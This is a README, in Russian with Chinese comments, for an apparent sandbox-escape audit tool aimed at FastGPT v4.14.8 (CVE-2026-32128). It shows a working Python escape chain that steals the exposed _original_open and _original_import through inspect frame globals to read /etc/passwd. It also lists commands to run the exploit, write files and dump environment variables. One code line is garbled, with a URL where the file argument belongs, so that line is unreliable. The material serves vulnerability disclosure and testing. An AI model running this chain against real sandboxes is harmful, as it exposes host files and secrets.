
Инструмент аудита цепочки побега из песочницы FastGPT (связан с CVE-2026-32128, инспекция цепочки v4.14.8)
Инструмент аудита цепочек побега из Python-песочницы FastGPT.
Узел «Выполнение кода» в рабочих процессах FastGPT передаёт пользовательский Python-код в изолированную песочницу. В v4.14.8 защита песочницы реализована чисто на Python (чёрный список модулей + проверка AST + защита open + защита import); этот инструмент обнаруживает и проверяет цепочки обхода этих защит:
import inspect # inspect 不在 _DANGEROUS_STDLIB 黑名单
g = inspect.currentframe().f_back.f_globals # AST 检查不拦单下划线帧属性
f = g['_original_open'](https://github.com/qianlijaingshan/fastgpt-sandbox-audit/blob/main/%27/etc/passwd%27) # 模块全局暴露原始 open 引用
imp = g['_original_import'] # 模块全局暴露原始 __import__ 引用
| Версия | Архитектура | Статус |
|---|
| v4.14.7 | NestJS + Fastify + seccomp | CVE-2026-32128 (переопределение stdout через fcntl) |
| v4.14.8 | Bun + Hono + worker.py | цепочка побега из этой статьи, полный побег (произвольные файлы в контейнере + горизонтальное перемещение по сети) |
| main | Go native chroot + seccomp | Python-слой также обходится, chroot как запасной вариант ограничивает контейнером |
Только стандартная библиотека, Python 3.8+.
# 静态检测 worker.py 防护配置(不执行 payload)
python3 fastgpt-sandbox-audit.py --check
# 对真实 worker.py 跑完整逃逸链(读 /etc/passwd + 写文件)
python3 fastgpt-sandbox-audit.py --exploit
# 导出环境变量(前 20 个 key)
python3 fastgpt-sandbox-audit.py --dump
# 指定 worker.py 路径
python3 fastgpt-sandbox-audit.py --worker /path/to/worker.py --exploit
Для --exploit требуется настоящий worker.py (Python-процесс worker песочницы FastGPT v4.14.8); по умолчанию читается ./worker.py из текущего каталога, payload отправляется через собственный JSON-протокол stdin ({"type":"init"} → {"type":"task","code":...}).
=== fastgpt-sandbox-audit: 防护配置检查 ===
[风险] inspect 不在 _DANGEROUS_STDLIB 黑名单 -> 可 import
[风险] AST 检查未拦截 f_globals 属性
[风险] 模块全局暴露 _original_open -> 可被 f_globals 窃取
[风险] 模块全局暴露 _original_import -> 可被 f_globals 窃取
[提示] worker.py 无 seccomp (4.14.8+ 纯 Python 防护)
Данный инструмент предназначен только для исследований в области безопасности и санкционированного тестирования безопасности. Несанкционированное тестирование чужих систем может нарушать законодательство; вся ответственность лежит на вас.